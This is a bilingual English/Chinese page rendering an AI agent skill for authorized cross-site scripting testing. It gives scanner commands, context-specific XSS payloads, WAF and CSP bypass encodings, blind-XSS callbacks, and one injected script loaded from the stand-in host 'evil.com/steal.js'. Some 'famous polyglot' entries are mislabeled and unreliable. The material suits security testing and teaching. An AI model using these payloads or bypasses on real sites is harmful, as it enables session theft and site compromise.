Back to Details

exploit-xss

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Cross-Site Scripting (XSS) Detection Skill

跨站脚本(XSS)检测技能

⚠️ DANGER - Authorization Required

⚠️ 危险 - 需获得授权

This skill is for AUTHORIZED SECURITY TESTING ONLY.
You must have:
  • Written permission from the target system owner
  • Legal authorization to test the target
  • A defined scope of testing
Unauthorized XSS testing is ILLEGAL and unethical.
本技能仅用于授权的安全测试。
你必须具备:
  • 目标系统所有者的书面许可
  • 测试目标的合法授权
  • 明确的测试范围
未经授权的XSS测试是非法且不道德的。

Prerequisites

前置条件

Required Tools

必备工具

bash
undefined
bash
undefined

XSStrike - Advanced XSS scanner with DOM support

XSStrike - 支持DOM的高级XSS扫描器

pip install xsstrike
pip install xsstrike

Or: git clone https://github.com/s0md3v/XSStrike

或者:git clone https://github.com/s0md3v/XSStrike

Dalfox - Fast XSS scanner with pipeline mode

Dalfox - 支持管道模式的快速XSS扫描器

go install github.com/hahwul/dalfox/v2@latest
go install github.com/hahwul/dalfox/v2@latest

XSpear - XSS testing with WAF bypass

XSpear - 支持WAF绕过的XSS测试工具

gem install xspear
undefined
gem install xspear
undefined

Python Requirements

Python依赖

bash
undefined
bash
undefined

Install required Python packages for built-in scripts

为内置脚本安装所需的Python包

pip install requests beautifulsoup4
pip install requests beautifulsoup4

Optional: WebSocket XSS testing

可选:WebSocket XSS测试

pip install websockets
undefined
pip install websockets
undefined

Optional Tools

可选工具

bash
undefined
bash
undefined

Burp Suite for manual testing

Burp Suite 用于手动测试

OWASP ZAP for automated scanning

OWASP ZAP 用于自动化扫描


---

---

Quick Start

快速开始

Basic URL Testing

基础URL测试

bash
undefined
bash
undefined

Test a URL parameter for XSS

测试URL参数是否存在XSS

python xsstrike.py -u "https://target.com/search?q=test"
python xsstrike.py -u "https://target.com/search?q=test"

Fast scanning with Dalfox

使用Dalfox进行快速扫描

dalfox url "https://target.com/search?q=test"
undefined
dalfox url "https://target.com/search?q=test"
undefined

POST Request Testing

POST请求测试

bash
undefined
bash
undefined

Save POST request to file

将POST请求保存到文件

dalfox file request.txt
dalfox file request.txt

Or use XSStrike

或者使用XSStrike

python xsstrike.py -r request.txt
undefined
python xsstrike.py -r request.txt
undefined

DOM XSS Testing

DOM型XSS测试

bash
undefined
bash
undefined

DOM XSS with XSStrike

使用XSStrike测试DOM型XSS

python xsstrike.py -u "https://target.com/page#test" --dom
python xsstrike.py -u "https://target.com/page#test" --dom

DOM XSS with Dalfox

使用Dalfox测试DOM型XSS

dalfox url "https://target.com/page#test" --dom

---
dalfox url "https://target.com/page#test" --dom

---

Common Scenarios

常见场景

1. Basic Parameter Testing (Reflected XSS)

1. 基础参数测试(反射型XSS)

Test URL parameters for reflection and injection:
bash
undefined
测试URL参数的反射和注入情况:
bash
undefined

Single URL testing

单个URL测试

python xsstrike.py -u "https://target.com/search?q=test"
python xsstrike.py -u "https://target.com/search?q=test"

Dalfox for faster scanning

使用Dalfox进行更快的扫描

dalfox url "https://target.com/search?q=test"
dalfox url "https://target.com/search?q=test"

Specify parameter

指定参数

dalfox url "https://target.com/search" -p q

**What to check:**
- Does the input reflect in the HTML response?
- What is the context (HTML tag, attribute, JavaScript)?
- Are there any filters/encoding applied?
dalfox url "https://target.com/search" -p q

**需要检查的内容:**
- 输入是否在HTML响应中反射?
- 上下文是什么(HTML标签、属性、JavaScript)?
- 是否应用了任何过滤/编码?

2. POST Request XSS (Form Testing)

2. POST请求XSS(表单测试)

Test POST forms for stored/reflected XSS:
bash
undefined
测试POST表单是否存在存储型/反射型XSS:
bash
undefined

Save request to file first

先将请求保存到文件

echo 'POST /login HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded
username=test&password=test' > post_request.txt
echo 'POST /login HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded
username=test&password=test' > post_request.txt

Test with XSStrike

使用XSStrike测试

python xsstrike.py -r post_request.txt
python xsstrike.py -r post_request.txt

Test with Dalfox

使用Dalfox测试

dalfox file post_request.txt

**Common POST targets:**
- Login forms (username, email fields)
- Contact forms (name, message fields)
- Search forms
- Comment forms
- User profile updates
dalfox file post_request.txt

**常见POST测试目标:**
- 登录表单(用户名、邮箱字段)
- 联系表单(姓名、消息字段)
- 搜索表单
- 评论表单
- 用户资料更新

3. Cookie and Header XSS

3. Cookie与请求头XSS

Test HTTP headers and cookies for injection:
bash
undefined
测试HTTP请求头和Cookie的注入情况:
bash
undefined

Test with custom cookies

使用自定义Cookie测试

python xsstrike.py -u "https://target.com" --cookie "session=test&user=<script>alert(1)</script>"
python xsstrike.py -u "https://target.com" --cookie "session=test&user=<script>alert(1)</script>"

Test User-Agent header

测试User-Agent请求头

python xsstrike.py -u "https://target.com" --user-agent "<script>alert(1)</script>"
python xsstrike.py -u "https://target.com" --user-agent "<script>alert(1)</script>"

Test Referer header (often reflects in error pages)

测试Referer请求头(通常会在错误页面中反射)

python xsstrike.py -u "https://target.com" --referer "https://evil.com/<script>alert(1)</script>"

**Headers to test:**
- User-Agent (check application logs/error pages)
- Referer (check 404 pages, analytics)
- X-Forwarded-For (check IP reflection)
- Cookie (check welcome messages/logs)
python xsstrike.py -u "https://target.com" --referer "https://evil.com/<script>alert(1)</script>"

**需要测试的请求头:**
- User-Agent(检查应用日志/错误页面)
- Referer(检查404页面、分析数据)
- X-Forwarded-For(检查IP反射)
- Cookie(检查欢迎消息/日志)

4. Reflected XSS Detection

4. 反射型XSS检测

Identify reflection points and test payloads:
bash
undefined
识别反射点并测试payload:
bash
undefined

Automated reflection detection

自动检测反射点

dalfox url "https://target.com/search?q=test" --only-discovery
dalfox url "https://target.com/search?q=test" --only-discovery

Manual reflection analysis

手动分析反射情况

scripts/xss_context_analyzer.py "https://target.com/search?q=test"
scripts/xss_context_analyzer.py "https://target.com/search?q=test"

Differential response analysis

差异响应分析

python xsstrike.py -u "https://target.com/search?q=test" --blind

**Detection techniques:**
- Compare response length with/without payload
- Search for payload in response HTML
- Check for encoding/filtering patterns
- Identify HTML context (tag, attribute, JS, CSS)
python xsstrike.py -u "https://target.com/search?q=test" --blind

**检测技术:**
- 对比有无payload时的响应长度
- 在响应HTML中搜索payload
- 检查编码/过滤模式
- 识别HTML上下文(标签、属性、JS、CSS)

5. Stored XSS Testing (Database Persistence)

5. 存储型XSS测试(数据库持久化)

Test for XSS that persists in the database:
bash
undefined
测试是否存在可持久化到数据库的XSS:
bash
undefined

Test comment/feedback forms

测试评论/反馈表单

dalfox file post_request.txt --blind https://your-callback.burpcollaborator.net
dalfox file post_request.txt --blind https://your-callback.burpcollaborator.net

Test user profile fields

测试用户资料字段

python xsstrike.py -r profile_update_request.txt
python xsstrike.py -r profile_update_request.txt

Time-based detection for stored XSS

基于时间的存储型XSS检测

scripts/blind_xss_tester.py --url "https://target.com/contact" --form-data "name=test&email=test@test.com&message=payload"

**Stored XSS targets:**
- User profiles (name, bio, location)
- Comments/Reviews
- Forum posts
- Email/contact forms (admin panel XSS)
- File upload metadata
scripts/blind_xss_tester.py --url "https://target.com/contact" --form-data "name=test&email=test@test.com&message=payload"

**存储型XSS测试目标:**
- 用户资料(姓名、简介、位置)
- 评论/评价
- 论坛帖子
- 邮件/联系表单(管理面板XSS)
- 文件上传元数据

6. DOM XSS Discovery

6. DOM型XSS发现

Find client-side XSS vulnerabilities:
bash
undefined
查找客户端XSS漏洞:
bash
undefined

DOM XSS scanning

DOM型XSS扫描

python xsstrike.py -u "https://target.com/page#input" --dom
python xsstrike.py -u "https://target.com/page#input" --dom

Dalfox DOM mode

Dalfox DOM模式

dalfox url "https://target.com/page#input" --dom
dalfox url "https://target.com/page#input" --dom

Manual DOM source analysis

手动分析DOM源

scripts/xss_context_analyzer.py --dom "https://target.com/page"

**Common DOM sources:**
- `location.hash`
- `location.search`
- `document.cookie`
- `document.referrer`
- `window.name`

**Common DOM sinks:**
- `innerHTML`
- `document.write()`
- `eval()`
- `location.href`
- `setTimeout()` / `setInterval()`
scripts/xss_context_analyzer.py --dom "https://target.com/page"

**常见DOM源:**
- `location.hash`
- `location.search`
- `document.cookie`
- `document.referrer`
- `window.name`

**常见DOM sink:**
- `innerHTML`
- `document.write()`
- `eval()`
- `location.href`
- `setTimeout()` / `setInterval()`

7. Blind XSS in Forms (Contact/Admin XSS)

7. 表单中的盲XSS(联系/管理面板XSS)

Test XSS in forms that execute in admin panels:
bash
undefined
测试在管理面板中执行的表单XSS:
bash
undefined

Generate blind XSS payloads with callback

生成带回调的盲XSS payload

scripts/xss_payload_generator.py --blind --callback "https://your-callback.com"
scripts/xss_payload_generator.py --blind --callback "https://your-callback.com"

Test contact form with blind payload

使用盲payload测试联系表单

dalfox file contact_request.txt --blind https://your-callback.burpcollaborator.net
dalfox file contact_request.txt --blind https://your-callback.burpcollaborator.net

XSpear blind mode

XSpear盲模式

xspear -u "https://target.com/contact" -d "name=test&message=<script src=https://evil.com/steal.js></script>"

**Blind XSS testing tips:**
- Use unique payloads per test (to identify which parameter is vulnerable)
- Use Burp Collaborator or interactsh for callbacks
- Test email contact forms (executes when admin opens email)
- Test support ticket systems
xspear -u "https://target.com/contact" -d "name=test&message=<script src=https://evil.com/steal.js></script>"

**盲XSS测试技巧:**
- 每个测试使用唯一的payload(以识别哪个参数存在漏洞)
- 使用Burp Collaborator或interactsh获取回调
- 测试邮件联系表单(管理员打开邮件时执行)
- 测试支持工单系统

8. Context-Aware Payloads

8. 上下文感知Payload

Use payloads specific to the injection context:
bash
undefined
使用针对注入上下文的特定payload:
bash
undefined

Analyze context first

先分析上下文

scripts/xss_context_analyzer.py "https://target.com/search?q=test"
scripts/xss_context_analyzer.py "https://target.com/search?q=test"

Generate context-specific payloads

生成特定上下文的payload

scripts/xss_payload_generator.py --context html-attribute scripts/xss_payload_generator.py --context javascript scripts/xss_payload_generator.py --context url

**Context-specific payloads:**

**HTML Body/Tag:**
```html
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
HTML Attribute:
html
" onmouseover=alert('XSS')
javascript:alert('XSS')
JavaScript:
javascript
';alert('XSS');//
'-alert('XSS')-
</script><script>alert('XSS')</script>
CSS/Style:
css
</style><script>alert('XSS')</script>
expression(alert('XSS'))
scripts/xss_payload_generator.py --context html-attribute scripts/xss_payload_generator.py --context javascript scripts/xss_payload_generator.py --context url

**特定上下文的payload:**

**HTML主体/标签:**
```html
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
HTML属性:
html
" onmouseover=alert('XSS')
javascript:alert('XSS')
JavaScript:
javascript
';alert('XSS');//
'-alert('XSS')-
</script><script>alert('XSS')</script>
CSS/样式:
css
</style><script>alert('XSS')</script>
expression(alert('XSS'))

9. WAF Bypass Techniques

9. WAF绕过技术

Evade Web Application Firewalls:
bash
undefined
规避Web应用防火墙:
bash
undefined

Generate WAF bypass payloads

生成WAF绕过payload

scripts/xss_payload_generator.py --waf-bypass
scripts/xss_payload_generator.py --waf-bypass

Use XSpear with bypass mode

使用XSpear的绕过模式

xspear -u "https://target.com/search?q=test" --bypass
xspear -u "https://target.com/search?q=test" --bypass

Test various encodings

测试各种编码

python xsstrike.py -u "https://target.com/search?q=test" --encode

**Bypass techniques:**
- URL encoding: `%3Cscript%3Ealert(1)%3C/script%3E`
- Double encoding: `%253Cscript%253E`
- Unicode encoding: `\u003Cscript\u003E`
- HTML entities: `&lt;script&gt;alert(1)&lt;/script&gt;`
- Case mixing: `<ScRiPt>alert(1)</sCrIpT>`
- Comment injection: `<script><!-- anything -->alert(1)</script>`
- Tab/newline injection: `<script\t>alert(1)</script>`
python xsstrike.py -u "https://target.com/search?q=test" --encode

**绕过技术:**
- URL编码:`%3Cscript%3Ealert(1)%3C/script%3E`
- 双重编码:`%253Cscript%253E`
- Unicode编码:`\u003Cscript\u003E`
- HTML实体:`&lt;script&gt;alert(1)&lt;/script&gt;`
- 大小写混合:`<ScRiPt>alert(1)</sCrIpT>`
- 注释注入:`<script><!-- anything -->alert(1)</script>`
- 制表符/换行符注入:`<script\t>alert(1)</script>`

10. Automated Scanning (Batch Testing)

10. 自动化扫描(批量测试)

Scan multiple URLs/parameters:
bash
undefined
扫描多个URL/参数:
bash
undefined

Scan from file

从文件中扫描

dalfox file urls.txt
dalfox file urls.txt

Pipe from other tools

从其他工具管道输入

cat urls.txt | dalfox pipe
cat urls.txt | dalfox pipe

XSStrike with multiple targets

使用XSStrike测试多个目标

for url in $(cat urls.txt); do python xsstrike.py -u "$url"; done
for url in $(cat urls.txt); do python xsstrike.py -u "$url"; done

Combine with subdomain enumeration

结合子域名枚举

subfinder example.com | httpx | dalfox pipe
undefined
subfinder example.com | httpx | dalfox pipe
undefined

11. Payload Encoding Variations

11. Payload编码变体

Test with different encoding schemes:
bash
undefined
测试不同的编码方案:
bash
undefined

URL encode payloads

URL编码payload

scripts/xss_payload_generator.py --encode url
scripts/xss_payload_generator.py --encode url

HTML encode

HTML编码

scripts/xss_payload_generator.py --encode html
scripts/xss_payload_generator.py --encode html

Hex encode

十六进制编码

scripts/xss_payload_generator.py --encode hex
scripts/xss_payload_generator.py --encode hex

Test with XSStrike encoding

使用XSStrike的编码功能

python xsstrike.py -u "https://target.com" --encode

**Common encodings to test:**
1. Plain: `<script>alert(1)</script>`
2. URL encoded: `%3Cscript%3Ealert(1)%3C/script%3E`
3. Double URL encoded: `%253Cscript%253E`
4. HTML entities: `&lt;script&gt;alert(1)&lt;/script&gt;`
5. Hex: `\x3Cscript\x3Ealert(1)\x3C/script\x3E`
6. Unicode: `\u003Cscript\u003Ealert(1)\u003C/script\u003E`
python xsstrike.py -u "https://target.com" --encode

**需要测试的常见编码:**
1. 明文:`<script>alert(1)</script>`
2. URL编码:`%3Cscript%3Ealert(1)%3C/script%3E`
3. 双重URL编码:`%253Cscript%253E`
4. HTML实体:`&lt;script&gt;alert(1)&lt;/script&gt;`
5. 十六进制:`\x3Cscript\x3Ealert(1)\x3C/script\x3E`
6. Unicode:`\u003Cscript\u003Ealert(1)\u003C/script\u003E`

12. Polyglot Payloads

12. 多上下文Payload(Polyglot)

Test with payloads that work in multiple contexts:
bash
undefined
测试可在多种上下文生效的payload:
bash
undefined

Generate polyglot payloads

生成多上下文payload

scripts/xss_payload_generator.py --polyglot
scripts/xss_payload_generator.py --polyglot

Common polyglot payload

常见多上下文payload

Works in: HTML, HTML attribute, JavaScript string, etc.

适用于:HTML、HTML属性、JavaScript字符串等场景

javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A

**Famous polyglot payloads:**

```javascript
javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A

**著名多上下文payload:**

```javascript

Ashar Javed's polyglot

Ashar Javed的多上下文payload

%3Cscript%3Ealert(1)%3C/script%3E
%3Cscript%3Ealert(1)%3C/script%3E

Mathias Karlsson's polyglot

Mathias Karlsson的多上下文payload

javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A
javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A

Another polyglot

另一个多上下文payload

%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
undefined
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
undefined

13. CSP Detection and Bypass

13. CSP检测与绕过

Content Security Policy analysis and bypass testing:
bash
undefined
内容安全策略分析与绕过测试:
bash
undefined

Detect and analyze CSP

检测并分析CSP

python scripts/csp_detector.py https://target.com
python scripts/csp_detector.py https://target.com

Generate bypass report

生成绕过报告

python scripts/csp_detector.py https://target.com --bypass
python scripts/csp_detector.py https://target.com --bypass

Full CSP analysis

完整CSP分析

python scripts/csp_detector.py https://target.com --verbose

**Common CSP bypass techniques:**
- `unsafe-inline` - allows inline scripts
- `unsafe-eval` - allows eval(), setTimeout()
- `data:` URLs - inline scripts via data URI
- Wildcard sources - allows any domain
- Nonce-based bypasses
- Framework-specific bypasses

See `references/csp_bypass_guide.md` for detailed techniques.
python scripts/csp_detector.py https://target.com --verbose

**常见CSP绕过技术:**
- `unsafe-inline` - 允许内联脚本
- `unsafe-eval` - 允许eval()、setTimeout()
- `data:` URLs - 通过数据URI实现内联脚本
- 通配符源 - 允许任意域名
- 基于Nonce的绕过
- 框架特定绕过

详细技术请参考`references/csp_bypass_guide.md`。

14. Framework-Specific XSS

14. 框架特定XSS

Test for Angular, React, Vue, and other framework vulnerabilities:
bash
undefined
测试Angular、React、Vue等框架的漏洞:
bash
undefined

Auto-detect frameworks

自动检测框架

python scripts/framework_xss_tester.py --url https://target.com --detect
python scripts/framework_xss_tester.py --url https://target.com --detect

Test Angular XSS

测试Angular XSS

python scripts/framework_xss_tester.py --url https://target.com --param q --framework angular
python scripts/framework_xss_tester.py --url https://target.com --param q --framework angular

Test React XSS

测试React XSS

python scripts/framework_xss_tester.py --url https://target.com --param data --framework react
python scripts/framework_xss_tester.py --url https://target.com --param data --framework react

Test Vue XSS

测试Vue XSS

python scripts/framework_xss_tester.py --url https://target.com --param content --framework vue

**Common framework vectors:**
- Angular: `{{constructor.constructor('alert(1)')()}}`
- React: `dangerouslySetInnerHTML`
- Vue: `v-html` directive
- jQuery: `.html()` manipulation

See `references/framework_xss_guide.md` for detailed techniques.
python scripts/framework_xss_tester.py --url https://target.com --param content --framework vue

**常见框架攻击向量:**
- Angular: `{{constructor.constructor('alert(1)')()}}`
- React: `dangerouslySetInnerHTML`
- Vue: `v-html`指令
- jQuery: `.html()`操作

详细技术请参考`references/framework_xss_guide.md`。

15. SVG File Upload XSS

15. SVG文件上传XSS

Test for SVG-based XSS in file uploads:
bash
undefined
测试文件上传中的SVG型XSS:
bash
undefined

Generate SVG payloads

生成SVG payload

python scripts/svg_xss_tester.py --generate --variant file_upload
python scripts/svg_xss_tester.py --generate --variant file_upload

Test SVG injection

测试SVG注入

python scripts/svg_xss_tester.py --url https://target.com --param content
python scripts/svg_xss_tester.py --url https://target.com --param content

Test SVG file upload

测试SVG文件上传

python scripts/svg_xss_tester.py --upload-url https://target.com/upload --file-param avatar
python scripts/svg_xss_tester.py --upload-url https://target.com/upload --file-param avatar

Create exploit SVG

创建利用SVG

python scripts/svg_xss_tester.py --save-svg exploit.svg --callback https://your-callback.com

**SVG XSS vectors:**
- `<svg onload="alert('XSS')">`
- `<svg><script>alert('XSS')</script></svg>`
- `<svg><foreignObject><iframe src="javascript:alert('XSS')"></iframe></foreignObject></svg>`

See `references/svg_xss_guide.md` for detailed techniques.
python scripts/svg_xss_tester.py --save-svg exploit.svg --callback https://your-callback.com

**SVG XSS攻击向量:**
- `<svg onload="alert('XSS')">`
- `<svg><script>alert('XSS')</script></svg>`
- `<svg><foreignObject><iframe src="javascript:alert('XSS')"></iframe></foreignObject></svg>`

详细技术请参考`references/svg_xss_guide.md`。

16. Mutation XSS (mXSS)

16. 变异型XSS(mXSS)

Test for HTML mutation-based XSS:
bash
undefined
测试基于HTML变异的XSS:
bash
undefined

Test all mutation types

测试所有变异类型

python scripts/mutation_xss_tester.py --url https://target.com --param q --type all
python scripts/mutation_xss_tester.py --url https://target.com --param q --type all

Test DOM clobbering

测试DOM覆盖

python scripts/mutation_xss_tester.py --url https://target.com --param q --dom-clobber
python scripts/mutation_xss_tester.py --url https://target.com --param q --dom-clobber

Test attribute mutations

测试属性变异

python scripts/mutation_xss_tester.py --url https://target.com --param q --attribute

**Mutation XSS vectors:**
- Entity decoding mutations: `&lt;` → `<`
- Tag parsing mutations: `<xmp>`, `<listing>`
- DOM clobbering: `<a id="location">`
- Namespace mutations: SVG/MathML

See `references/mutation_xss_guide.md` for detailed techniques.
python scripts/mutation_xss_tester.py --url https://target.com --param q --attribute

**变异型XSS攻击向量:**
- 实体解码变异: `&lt;` → `<`
- 标签解析变异: `<xmp>`、`<listing>`
- DOM覆盖: `<a id="location">`
- 命名空间变异: SVG/MathML

详细技术请参考`references/mutation_xss_guide.md`。

17. WebSocket XSS

17. WebSocket XSS

Test for XSS vulnerabilities in WebSocket connections:
bash
undefined
测试WebSocket连接中的XSS漏洞:
bash
undefined

Scan URL for WebSocket endpoints

扫描URL中的WebSocket端点

python scripts/websocket_xss_tester.py --url https://target.com
python scripts/websocket_xss_tester.py --url https://target.com

Test specific WebSocket URL

测试特定WebSocket URL

python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws

Test DOM injection via WebSocket

测试通过WebSocket进行DOM注入

python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-dom
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-dom

Test stored XSS in WebSocket

测试WebSocket中的存储型XSS

python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-stored
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-stored

Test with custom payload

使用自定义payload测试

python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --payload '<script>alert(1)</script>'

**WebSocket XSS vectors:**
- Message reflection: `ws.send('<script>alert(1)</script>')`
- JSON injection: `{"message": "<img src=x onerror=alert(1)>"}`
- Event handler: `ws.send('alert(1);')`
- Attribute breaking: `" onmouseover=alert(1)`

See `references/websocket_xss_guide.md` for detailed techniques.

---
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --payload '<script>alert(1)</script>'

**WebSocket XSS攻击向量:**
- 消息反射: `ws.send('<script>alert(1)</script>')`
- JSON注入: `{"message": "<img src=x onerror=alert(1)>"}`
- 事件处理器: `ws.send('alert(1);')`
- 属性破坏: `" onmouseover=alert(1)`

详细技术请参考`references/websocket_xss_guide.md`。

---

Tool Selection Guide

工具选择指南

ScenarioRecommended ToolCommand
Quick parameter testingDalfox
dalfox url "https://target.com?param=test"
Deep scanning with DOMXSStrike
python xsstrike.py -u "URL" --dom
WAF bypass testingXSpear
xspear -u "URL" --bypass
Stored/Blind XSSDalfox + Callback
dalfox file req.txt --blind CALLBACK
Manual testingXSStrike
python xsstrike.py -r request.txt
Batch scanningDalfox pipe
cat urls.txt | dalfox pipe
CSP AnalysisCSP Detector
python scripts/csp_detector.py URL
Framework XSSFramework Tester
python scripts/framework_xss_tester.py -u URL -p param
SVG XSSSVG Tester
python scripts/svg_xss_tester.py -u URL -p param
Mutation XSSMutation Tester
python scripts/mutation_xss_tester.py -u URL -p param
WebSocket XSSWebSocket Tester
python scripts/websocket_xss_tester.py -u URL
Full ScanFull Scanner
python scripts/xss_full_scan.py -u URL --all
Tool Comparison:
FeatureXSStrikeDalfoxXSpearBuilt-in Scripts
SpeedMediumFastMediumVaries
DOM XSSExcellentGoodLimitedGood
WAF BypassGoodGoodExcellentGood
Pipeline ModeNoYesNoNo
Blind XSSYesYesYesYes
CSP AnalysisNoNoNoYes
Framework TestingNoNoNoYes
SVG TestingNoNoNoYes
Mutation XSSNoNoNoYes
WebSocket XSSNoNoNoYes
场景推荐工具命令
快速参数测试Dalfox
dalfox url "https://target.com?param=test"
带DOM支持的深度扫描XSStrike
python xsstrike.py -u "URL" --dom
WAF绕过测试XSpear
xspear -u "URL" --bypass
存储型/盲XSSDalfox + 回调
dalfox file req.txt --blind CALLBACK
手动测试XSStrike
python xsstrike.py -r request.txt
批量扫描Dalfox管道
cat urls.txt | dalfox pipe
CSP分析CSP Detector
python scripts/csp_detector.py URL
框架XSS测试Framework Tester
python scripts/framework_xss_tester.py -u URL -p param
SVG XSS测试SVG Tester
python scripts/svg_xss_tester.py -u URL -p param
变异型XSS测试Mutation Tester
python scripts/mutation_xss_tester.py -u URL -p param
WebSocket XSS测试WebSocket Tester
python scripts/websocket_xss_tester.py -u URL
全面扫描Full Scanner
python scripts/xss_full_scan.py -u URL --all
工具对比:
特性XSStrikeDalfoxXSpear内置脚本
速度中等快速中等各不相同
DOM XSS支持优秀良好有限良好
WAF绕过良好良好优秀良好
管道模式
盲XSS支持
CSP分析
框架测试
SVG测试
变异型XSS测试
WebSocket XSS测试

Testing Checklist

测试检查清单

Reconnaissance Phase

侦察阶段

  • Identify all input points (URL params, forms, headers, cookies)
  • Map out application functionality
  • Identify data storage locations
  • 识别所有输入点(URL参数、表单、请求头、Cookie)
  • 梳理应用功能
  • 识别数据存储位置

Reflected XSS Testing

反射型XSS测试

  • Test all URL parameters
  • Test all form fields (GET/POST)
  • Test HTTP headers (UA, Referer, Cookie)
  • Identify reflection context
  • Test context-specific payloads
  • 测试所有URL参数
  • 测试所有表单字段(GET/POST)
  • 测试HTTP请求头(UA、Referer、Cookie)
  • 识别反射上下文
  • 测试特定上下文的payload

Stored XSS Testing

存储型XSS测试

  • Test all form submissions
  • Test file upload metadata
  • Test user profile fields
  • Test comments/reviews
  • Verify persistence across sessions
  • Test execution in different user contexts
  • 测试所有表单提交
  • 测试文件上传元数据
  • 测试用户资料字段
  • 测试评论/评价
  • 验证跨会话持久性
  • 测试不同用户上下文下的执行情况

DOM XSS Testing

DOM型XSS测试

  • Identify all DOM sources
  • Trace data flow to sinks
  • Test hash-based injections
  • Test URL parameter-based injections
  • Test localStorage/sessionStorage
  • 识别所有DOM源
  • 追踪数据流到sink
  • 测试基于哈希的注入
  • 测试基于URL参数的注入
  • 测试localStorage/sessionStorage

Advanced Testing

高级测试

  • Test WAF bypass techniques
  • Test encoding variations
  • Test polyglot payloads
  • Perform blind XSS testing
  • Test for CSP bypasses
  • Test framework-specific XSS (Angular/React/Vue)
  • Test SVG file upload XSS
  • Test Mutation XSS (DOM clobbering)
  • Test HTTP response header injection
  • Test WebSocket XSS (if applicable)
  • 测试WAF绕过技术
  • 测试编码变体
  • 测试多上下文payload
  • 执行盲XSS测试
  • 测试CSP绕过
  • 测试框架特定XSS(Angular/React/Vue)
  • 测试SVG文件上传XSS
  • 测试变异型XSS(DOM覆盖)
  • 测试HTTP响应头注入
  • 测试WebSocket XSS(如适用)

Scenario: Persistent Storage of XSS Findings

场景:XSS检测结果持久化存储

When you need to persist XSS findings to the database:
bash
undefined
当你需要将XSS检测结果持久化到数据库时:
bash
undefined

Manual entry after discovering XSS

发现XSS后手动录入

python .claude/skills/exploit-xss/scripts/xss_storage.py
--host-ip 192.168.1.100
--url "https://example.com/search?q=test"
--xss-type reflected
--payload "<script>alert(1)</script>"
--context html_body
--severity High
--subsystem "Web Application"

**Parameters:**
- `--host-ip` - Target host IP (required)
- `--url` - Vulnerable URL (required)
- `--xss-type` - XSS type: reflected, stored, or dom (required)
- `--payload` - Payload used (required)
- `--context` - XSS context: html_body, html_attribute, javascript, dom, url (default: html_body)
- `--severity` - Severity level (default: Medium)
- `--subsystem` - Subsystem name (optional)
- `--parameter` - Vulnerable parameter name
- `--title` - Vulnerability title (auto-generated if not specified)
- `--description` - Vulnerability description
- `--cvss-score` - CVSS score (0.0-10.0)

**Database location:** `./data/results.db`

**Related skills:** `results-storage` - Query data, generate reports

---
python .claude/skills/exploit-xss/scripts/xss_storage.py
--host-ip 192.168.1.100
--url "https://example.com/search?q=test"
--xss-type reflected
--payload "<script>alert(1)</script>"
--context html_body
--severity High
--subsystem "Web Application"

**参数说明:**
- `--host-ip` - 目标主机IP(必填)
- `--url` - 存在漏洞的URL(必填)
- `--xss-type` - XSS类型:reflected、stored或dom(必填)
- `--payload` - 使用的payload(必填)
- `--context` - XSS上下文:html_body、html_attribute、javascript、dom、url(默认:html_body)
- `--severity` - 严重级别(默认:Medium)
- `--subsystem` - 子系统名称(可选)
- `--parameter` - 存在漏洞的参数名称
- `--title` - 漏洞标题(未指定则自动生成)
- `--description` - 漏洞描述
- `--cvss-score` - CVSS评分(0.0-10.0)

**数据库位置:** `./data/results.db`

**相关技能:** `results-storage` - 查询数据、生成报告

---

Resources

资源

Scripts

脚本

  • scripts/xss_payload_generator.py
    - Generate XSS payloads for various contexts
  • scripts/xss_tester.py
    - Automated XSS testing framework
  • scripts/xss_context_analyzer.py
    - Analyze injection context
  • scripts/blind_xss_tester.py
    - Test stored/blind XSS
  • scripts/csp_detector.py
    - CSP analysis and bypass testing
  • scripts/svg_xss_tester.py
    - SVG file upload XSS testing
  • scripts/framework_xss_tester.py
    - Angular/React/Vue XSS testing
  • scripts/mutation_xss_tester.py
    - Mutation XSS/DOM clobbering testing
  • scripts/websocket_xss_tester.py
    - WebSocket XSS testing
  • scripts/mxss_detector.py
    - HTML parser mutation XSS detection
  • scripts/xss_full_scan.py
    - Integrated XSS testing automation
  • scripts/xss_payload_generator.py
    - 生成适用于多种场景的XSS payload
  • scripts/xss_tester.py
    - 自动化XSS测试框架
  • scripts/xss_context_analyzer.py
    - 分析注入上下文
  • scripts/blind_xss_tester.py
    - 测试存储型/盲XSS
  • scripts/csp_detector.py
    - CSP分析与绕过测试
  • scripts/svg_xss_tester.py
    - SVG文件上传XSS测试
  • scripts/framework_xss_tester.py
    - Angular/React/Vue XSS测试
  • scripts/mutation_xss_tester.py
    - 变异型XSS/DOM覆盖测试
  • scripts/websocket_xss_tester.py
    - WebSocket XSS测试
  • scripts/mxss_detector.py
    - HTML解析器变异型XSS检测
  • scripts/xss_full_scan.py
    - 集成式XSS测试自动化工具

Reference Documentation

参考文档

  • references/dalfox_guide.md
    - Dalfox complete guide
  • references/xsstrike_guide.md
    - XSStrike complete guide
  • references/xspear_guide.md
    - XSpear complete guide
  • references/xss_payload_techniques.md
    - XSS payload techniques
  • references/dom_xss_guide.md
    - DOM XSS testing guide
  • references/csp_bypass_guide.md
    - CSP bypass techniques
  • references/framework_xss_guide.md
    - Framework-specific XSS guide
  • references/svg_xss_guide.md
    - SVG XSS testing guide
  • references/mutation_xss_guide.md
    - Mutation XSS/DOM clobbering guide
  • references/websocket_xss_guide.md
    - WebSocket XSS testing guide
  • references/dalfox_guide.md
    - Dalfox完整指南
  • references/xsstrike_guide.md
    - XSStrike完整指南
  • references/xspear_guide.md
